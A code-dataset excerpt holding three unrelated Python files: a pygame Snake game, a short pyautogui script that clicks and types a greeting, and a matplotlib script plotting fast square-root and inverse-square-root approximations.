d1497c24a68cabd19f7e92ba5845c28a24d02302
|
6e4b228bf5a2a26553dcece3d79534518851a7f9
|
refs/heads/master
| 2021-01-10T10:36:19.932264 | 2020-01-02T18:45:40 | 2020-01-02T18:45:40 | 43,549,213 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,503 |
py
|
# coding: utf-8
import sys
import score as scoremodule
from block import Block
from blocks import Blocks
from pygame import display, image, event, init, font
from pygame.locals import *
# Public names exported by `from snake import *`.
# BUG FIX: this was misspelled "__alls__", which Python ignores entirely,
# so the intended star-import restriction never took effect.
__all__ = ["SCREEN_WIDTH", "SCREEN_HEIGHT", "BLOCK_SIZE", "START_POSITION", "main"]

# These parameters may be changed to resize the on-screen elements and
# the snake's starting position.
SCREEN_WIDTH = 588
SCREEN_HEIGHT = 588
BLOCK_SIZE = 28
START_POSITION = 280, 280

# Derived playfield limits; do not edit these directly or collision
# detection breaks — always derive them from the sizes above.
_SCREEN_MAX_LIMIT = SCREEN_WIDTH - BLOCK_SIZE
_SCREEN_MIN_LIMIT = BLOCK_SIZE

# Snake direction vector [x, y]:
#   [1, 0]  -> right (positive x)     [-1, 0] -> left (negative x)
#   [0, -1] -> up    (negative y)     [0, 1]  -> down (positive y)
_direction = [0, -1]
_olderDirection = [_direction[0], _direction[1]]

# Delay between frames in seconds (difficulty); main() overwrites it.
_velocity = .05

# Sprites are BLOCK_SIZE x BLOCK_SIZE pixels.  If the element size above
# changes, these images must be replaced to match.
BODY = image.load('./images/snake/body.png')
HEAD = image.load('./images/snake/head.png')
FRUIT = image.load('./images/snake/fruit.png')
TREE = image.load('./images/snake/tree.png')
def update_body_snake_positions():
    """Redraw the snake: blit the head, then shift each body block into
    the position its predecessor just vacated and blit it.

    Relies on the head's set_last_X/Y having been updated by game()
    before this is called.
    """
    global blocks
    global screen
    screen.blit(HEAD, (blocks.get_first_block().getX(),
                       blocks.get_first_block().getY()))
    for block in blocks.get_blocks()[1:]:
        # Remember this block's current position before moving it...
        block.set_last_X(block.getX())
        block.set_last_Y(block.getY())
        # ...then step into the position its predecessor just left.
        block.setX(block.get_before_block().get_last_X())
        block.setY(block.get_before_block().get_last_Y())
        screen.blit(BODY, (block.getX(), block.getY()))
def paint_trees():
    """Draw the tree border around the four edges of the playing field."""
    global screen
    cols = int(SCREEN_WIDTH / BLOCK_SIZE)
    rows = int(SCREEN_HEIGHT / BLOCK_SIZE)
    for col in range(cols):                                        # top edge
        screen.blit(TREE, (col * BLOCK_SIZE, 0))
    for row in range(rows):                                        # right edge
        screen.blit(TREE, (SCREEN_WIDTH - BLOCK_SIZE, row * BLOCK_SIZE))
    for col in range(cols):                                        # bottom edge
        screen.blit(TREE, (col * BLOCK_SIZE, SCREEN_HEIGHT - BLOCK_SIZE))
    for row in range(rows):                                        # left edge
        screen.blit(TREE, (0, row * BLOCK_SIZE))
def generate_fruit():
    """Return a random (x, y) pixel position for a new fruit.

    The position is chosen on the playable grid (excluding the one-block
    tree border) and is guaranteed not to overlap any snake block.

    Previously the grid bounds were hard-coded as randint(1, 19); they
    are now derived from SCREEN_WIDTH/SCREEN_HEIGHT and BLOCK_SIZE
    (identical with the default 588/28 layout), so resizing the board
    keeps fruit generation correct.
    """
    from random import randint
    global blocks
    # Interior cell indices run from 1 to cells-2 on each axis.
    max_cell_x = SCREEN_WIDTH // BLOCK_SIZE - 2
    max_cell_y = SCREEN_HEIGHT // BLOCK_SIZE - 2
    # Build the occupancy set once for O(1) membership tests.
    occupied = {(block.getX(), block.getY()) for block in blocks.get_blocks()}
    while True:
        pos = (randint(1, max_cell_x) * BLOCK_SIZE,
               randint(1, max_cell_y) * BLOCK_SIZE)
        if pos not in occupied:
            return pos
def check_collision(xMovement, yMovement):
    """Return True when the proposed head position hits the snake's own
    body or leaves the playable area bounded by the tree border."""
    for segment in blocks.get_blocks()[1:]:
        if segment.getX() == xMovement and segment.getY() == yMovement:
            return True
    out_of_bounds = (
        xMovement >= _SCREEN_MAX_LIMIT or xMovement < _SCREEN_MIN_LIMIT
        or yMovement >= _SCREEN_MAX_LIMIT or yMovement < _SCREEN_MIN_LIMIT
    )
    return out_of_bounds
def reset_game():
    """Reset direction and score (keeping the high score), then start a
    fresh round.

    NOTE(review): game() calls reset_game() when the player chooses to
    replay, so each round adds a stack frame — confirm this mutual
    recursion depth is acceptable for long sessions.
    """
    global score
    global _direction
    global _olderDirection
    _direction = [0, -1]
    _olderDirection = [_direction[0], _direction[1]]
    # Promote this round's score to the record before clearing it.
    if score.points > score.max_points:
        score.max_points = score.points
    score.points = 0
    # Drop any key presses queued while the game-over dialog was open.
    event.clear()
    initialize_game()
    game()
def initialize_game():
    """Create the pygame window, font, score label and the two-block
    starting snake, then draw the first frame."""
    global blocks
    global screen
    global score
    global posFruit
    global labelPoints
    global myfont
    init() # Pygame init
    screen = display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
    myfont = font.SysFont('monospace', 20)
    # Snake starts as a single head block at START_POSITION.
    blocks = Blocks(Block(*START_POSITION))
    # Sentinel (-1, -1): game() generates the first real fruit position.
    posFruit = (-1, -1)
    # INITIALIZE SCREEN POSITIONS
    # NOTE(review): the head is blitted at (BLOCK_SIZE, BLOCK_SIZE) while the
    # head block itself sits at START_POSITION — these literals look
    # inconsistent; confirm the intended first-frame layout.
    screen.blit(HEAD, (BLOCK_SIZE, BLOCK_SIZE))
    screen.blit(BODY, (START_POSITION[0] - BLOCK_SIZE, START_POSITION[1]))
    labelPoints = myfont.render("Score: " + str(score.points) + " "
                                + " Max. Score:" + str(score.max_points), 1, (255, 255, 0))
    screen.blit(labelPoints, (14, 7))
    paint_trees()
    # Second snake block, linked behind the head.
    blocks.add_block(Block(BLOCK_SIZE, START_POSITION[1] - BLOCK_SIZE))
    blocks.get_last_block().set_before_block(blocks.get_first_block())
    display.flip()
def game():
    """Main loop: advance the snake one block per tick, steer with the
    arrow keys, grow and score on fruit, and end the round on collision.

    Returns 0 when the player declines a replay; otherwise tail-calls
    reset_game() to start the next round.
    """
    from time import sleep
    from easygui import ynbox
    global score
    global _direction
    global _olderDirection
    global _velocity
    global blocks
    global screen
    global posFruit
    global labelPoints
    global myfont
    while 1:
        # Frame delay doubles as the difficulty setting.
        sleep(_velocity)
        screen.fill((0, 0, 0))
        paint_trees()
        screen.blit(labelPoints, (14, 7))
        if posFruit[0] == -1 and posFruit[1] == -1: # Default fruit position
            posFruit = generate_fruit()
        elif posFruit[0] == blocks.get_first_block().getX() and posFruit[1] == blocks.get_first_block().getY():
            # Head reached the fruit: append a new tail block one step
            # behind the current tail, opposite to the travel direction.
            b = Block(blocks.get_last_block().getX() - BLOCK_SIZE * _direction[0], blocks.get_last_block().getY() - BLOCK_SIZE * _direction[1])
            b.set_before_block(blocks.get_last_block())
            blocks.add_block(b)
            #blocks.get_last_block().set_before_block(blocks.get_blocks()[len(blocks.get_blocks()) - 2])
            posFruit = generate_fruit()
            score.points = score.points + 100
            labelPoints = myfont.render("Score: " + str(score.points) + " "
                                        + " Max. Score:" + str(score.max_points), 1, (255, 255, 0))
        screen.blit(FRUIT, posFruit)
        next_x = blocks.get_first_block().getX()
        next_y = blocks.get_first_block().getY()
        # Poll a single event per frame; key codes 273-276 are the arrows.
        eventP = event.poll()
        if eventP.type == NOEVENT:
            next_x = next_x + (BLOCK_SIZE * _direction[0])
            next_y = next_y + (BLOCK_SIZE * _direction[1])
        elif eventP.type == KEYDOWN and eventP.key == 275: # Right direction
            _direction[0] = 1
            _direction[1] = 0
            next_x = next_x + (BLOCK_SIZE * _direction[0])
            next_y = next_y + (BLOCK_SIZE * _direction[1])
        elif eventP.type == KEYDOWN and eventP.key == 276: # Left direction
            _direction[0] = -1
            _direction[1] = 0
            next_x = next_x + (BLOCK_SIZE * _direction[0])
            next_y = next_y + (BLOCK_SIZE * _direction[1])
        elif eventP.type == KEYDOWN and eventP.key == 274: # Down direction
            _direction[0] = 0
            _direction[1] = 1
            next_x = next_x + (BLOCK_SIZE * _direction[0])
            next_y = next_y + (BLOCK_SIZE * _direction[1])
        elif eventP.type == KEYDOWN and eventP.key == 273: # Up direction
            _direction[0] = 0
            _direction[1] = -1
            next_x = next_x + (BLOCK_SIZE * _direction[0])
            next_y = next_y + (BLOCK_SIZE * _direction[1])
        else: # No controlled event
            next_x = next_x + (BLOCK_SIZE * _direction[0])
            next_y = next_y + (BLOCK_SIZE * _direction[1])
        # The new direction is the exact reverse of the previous one
        # (component sums are zero on both axes): undo the reversal by
        # restoring the old direction and adding its step, which cancels
        # the reversed step already applied above.
        if (_olderDirection[0] + _direction[0]) == 0 and (_olderDirection[1] + _direction[1]) == 0:
            _direction = [_olderDirection[0],_olderDirection[1]]
            next_x = next_x + (BLOCK_SIZE * _direction[0])
            next_y = next_y + (BLOCK_SIZE * _direction[1])
        if check_collision(next_x, next_y):
            if ynbox('Total Score: ' + str(score.points) + ' . Do you want to play again?', 'End Game', ('Yes', 'No')):
                break
            else:
                score.write_score_file()
                return(0)
        # Record the head's old position (consumed by the body shift in
        # update_body_snake_positions), then move the head.
        blocks.get_first_block().set_last_X(blocks.get_first_block().getX())
        blocks.get_first_block().set_last_Y(blocks.get_first_block().getY())
        blocks.get_first_block().setX(next_x)
        blocks.get_first_block().setY(next_y)
        _olderDirection = [_direction[0], _direction[1]]
        update_body_snake_positions()
        display.flip()
    # Player chose to replay: start a new round.
    reset_game()
def main(difficulty):
    """Entry point: load the saved score, set the frame delay from
    *difficulty* ('Easy', 'Medium', 'Difficult' or 'Pro'), then run the
    game and return its exit value."""
    global score
    global _velocity
    score = scoremodule.Score('SNAKE')
    score.read_score_file()
    # Smaller delay between frames means a harder game; an unknown
    # difficulty string leaves the module default untouched.
    delays = {'Easy': .2, 'Medium': .1, 'Difficult': .05, 'Pro': .035}
    if difficulty in delays:
        _velocity = delays[difficulty]
    initialize_game()
    return game()
|
[
"[email protected]"
] | |
0c510cd43363ec78afcc84b81f6eb6776f6efc44
|
7ddc7de7889cbda2b0ce3e65a5316899a7c0094d
|
/keyboard_automation.py
|
23c324a86d5ec211b2eb242200b52db8f71e5e94
|
[] |
no_license
|
EoinGr3y/python
|
65c7be6704f6a69a06001e30208cc4c203450099
|
b63bf205c460adc664a4f8d64a2c2fdeca3234dd
|
refs/heads/master
| 2021-04-06T06:10:06.441713 | 2018-03-12T19:28:42 | 2018-03-12T19:28:42 | 124,940,634 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 127 |
py
|
import pyautogui

# Click at absolute screen coordinates (100, 100) to focus that spot.
pyautogui.click(100, 100)
# Type the greeting one character every 0.1 seconds.
pyautogui.typewrite('Hello world!', interval=0.1)
# Send the Ctrl+N keyboard shortcut.
pyautogui.hotkey('ctrl', 'n')
|
[
"[email protected]"
] | |
88ad2030fd1b92b61c508064827a5d5b5688d2d8
|
8370c98faafe9ebe7163946a438245886473cb8a
|
/Algorithms/float/float_plots.py
|
4236b80bd1bd84530d7eb6a9ea6d57f9d24d4636
|
[
"CC-BY-3.0"
] |
permissive
|
maksimovica/numerical_computing
|
54bf28f9eeaf260f11c812dd680870d453494961
|
634a8430a9e203e3ab70ffedfb1d75a185b294ca
|
refs/heads/master
| 2021-01-21T06:55:11.961085 | 2014-08-20T17:16:35 | 2014-08-20T17:16:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,798 |
py
|
import numpy as np
from numpy.random import rand
import matplotlib
matplotlib.rcParams = matplotlib.rc_params_from_file('../../matplotlibrc')
from matplotlib import pyplot as plt
def sqrt32(A, reps):
    """Approximate elementwise square root of a float32 array *A*.

    Seeds an initial guess by bit-shifting the IEEE-754 representation
    (the classic fast-sqrt hack), then refines it with *reps* Newton
    iterations.  *A* itself is never modified.
    """
    Ac = A.copy()
    # Reinterpret the float32 bits as int32 so integer arithmetic can
    # halve the exponent; this yields the magic initial estimate.
    I = Ac.view(dtype=np.int32)
    I >>= 1
    I += (1 << 29) - (1 << 22) - 0x4C000
    for _ in range(reps):  # Python-3 fix: was the Py2-only xrange
        Ac = .5 * (Ac + A / Ac)  # Newton: x <- (x + A/x) / 2
    return Ac
def sqrt64(A, reps):
    """Approximate elementwise square root of a float64 array *A*.

    Same bit-hack seeding as sqrt32 but with 64-bit constants, refined
    by *reps* Newton iterations.  *A* itself is never modified.
    """
    Ac = A.copy()
    # Halve the exponent bits of the IEEE-754 double representation.
    I = Ac.view(dtype=np.int64)
    I >>= 1
    I += (1 << 61) - (1 << 51)
    for _ in range(reps):  # Python-3 fix: was the Py2-only xrange
        Ac = .5 * (Ac + A / Ac)  # Newton: x <- (x + A/x) / 2
    return Ac
# These do the same thing as the cython functions for the inverse square root.
def invsqrt32(A, reps):
    """Approximate elementwise 1/sqrt(A) for a float32 array *A*.

    Uses the "fast inverse square root" bit hack (magic constant
    0x5f3759df) for the initial guess, then *reps* Newton iterations
    y <- y * (1.5 - (A/2) * y*y).  *A* itself is never modified.
    """
    Ac = A.copy()
    if 0 < reps:
        Ac2 = A.copy()
        Ac2 /= - 2                 # -A/2, reused by every Newton step
        Ac3 = np.empty_like(Ac)
    # Bit-level estimate: i = magic - (i >> 1), done in place on the view.
    I = Ac.view(dtype=np.int32)
    I >>= 1
    I *= -1
    I += 0x5f3759df  # hexadecimal representation of the constant
    for _ in range(reps):  # Python-3 fix: was the Py2-only xrange
        Ac3[:] = Ac
        Ac3 *= Ac
        Ac3 *= Ac2
        Ac3 += 1.5                 # now 1.5 - (A/2) * y^2
        Ac *= Ac3
    return Ac
def invsqrt64(A, reps):
    """Approximate elementwise 1/sqrt(A) for a float64 array *A*.

    Same algorithm as invsqrt32 with the 64-bit magic constant
    0x5fe6ec85e7de30da and *reps* Newton iterations
    y <- y * (1.5 - (A/2) * y*y).  *A* itself is never modified.
    """
    Ac = A.copy()
    if 0 < reps:
        Ac2 = A.copy()
        Ac2 /= - 2                 # -A/2, reused by every Newton step
        Ac3 = np.empty_like(Ac)
    # Bit-level estimate: i = magic - (i >> 1), done in place on the view.
    I = Ac.view(dtype=np.int64)
    I >>= 1
    I *= -1
    I += 0x5fe6ec85e7de30da  # hexadecimal representation of the constant
    for _ in range(reps):  # Python-3 fix: was the Py2-only xrange
        Ac3[:] = Ac
        Ac3 *= Ac
        Ac3 *= Ac2
        Ac3 += 1.5                 # now 1.5 - (A/2) * y^2
        Ac *= Ac3
    return Ac
# Compare the bit-hack approximations against numpy's exact results and
# save each comparison plot to a PDF in the working directory.

# Square root: raw bit estimate (0 Newton iterations) vs exact.
X = np.linspace(0, 3, 501)
plt.plot(X, sqrt64(X, 0), X, np.sqrt(X))
plt.savefig("sqrt0.pdf")
plt.cla()
# Square root: one Newton iteration vs exact.
plt.plot(X, sqrt64(X, 1), X, np.sqrt(X))
plt.savefig("sqrt1.pdf")
plt.cla()
# Inverse square root over x > 0 only, avoiding division by zero at 0.
X = np.linspace(.1, 3, 291)
plt.plot(X, invsqrt64(X, 0), X, 1./np.sqrt(X))
plt.savefig("invsqrt0.pdf")
plt.cla()
plt.plot(X, invsqrt64(X, 1), X, 1./np.sqrt(X))
plt.savefig("invsqrt1.pdf")
plt.cla()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.